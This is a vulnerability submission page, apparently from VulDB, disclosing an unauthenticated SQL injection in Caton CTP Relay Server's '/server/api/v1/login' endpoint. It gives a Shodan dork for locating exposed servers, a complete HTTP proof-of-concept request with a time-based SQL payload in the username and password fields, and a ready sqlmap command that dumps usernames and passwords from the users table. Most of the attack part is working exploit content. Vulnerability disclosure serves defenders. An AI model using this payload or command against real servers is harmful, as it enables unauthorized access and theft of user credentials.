| Title | Caton CTP Relay Server unknown version - SQL Injection Unauthenticated |
|---|
| Description | # Exploit Title: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
# Date: 2023-04-21
# Exploit Author: MrEmpy
# Version: unknown
# Shodan Dork: http.favicon.hash:-940032039 title:"Caton CTP Relay Server"
Title:
================
Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
Summary:
================
A SQL Injection vulnerability without authentication has been found in the Caton CTP Relay Server product, in an unknown version. This vulnerability allows an attacker to execute malicious SQL commands against the system's underlying database, which could result in unauthorized disclosure of sensitive information such as user credentials, payment details, and other sensitive data.
The vulnerability was found on the system's login page, at the "/server/api/v1/login" endpoint, where users send their access credentials to log in to the system. The vulnerable parameters are "username" and "password", which are sent via a JSON via POST.
By exploiting this vulnerability, an attacker could insert malicious SQL commands into the "username" and "password" parameters, which will be executed without proper validation. This could allow the attacker to execute malicious commands against the system's database, such as retrieving confidential information or manipulating data.
It is important to note that this vulnerability does not require user authentication, which means that anyone could exploit it without needing to have valid system credentials.
Severity Level:
================
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Affected Product:
================
Caton CTP Relay Server unknown version
Proof of Concept:
================
Request:
POST /server/api/v1/login HTTP/1.1
Host: target
Content-Length: 117
Accept: application/json, text/plain, */*
Accept-Language: en
X-Access-Token:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: application/json
Origin: http://target
Referer: http://target/login
Accept-Encoding: gzip, deflate
Connection: close
{"username":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR","password":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR"}
SQLMap command: sqlmap -u 'http://target/server/api/v1/login' --data='{"username":"3xpl","password":"3xpl"}' -p username --risk 3 --level 5 --batch --random-agent --dbms=MySQL --technique=B --threads=10 -D rrsWeb -T users -C username,password --dump |
|---|
| Source | ⚠️ .. |
|---|
| User | mrempy (UID 24379) |
|---|
| Submission | 04/21/2023 07:16 (3 years ago) |
|---|
| Moderation | 05/04/2023 17:56 (13 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 228010 [Caton CTP Relay Server 1.2.9 API /server/api/v1/login username/password sql injection] |
|---|
| Points | 17 |
|---|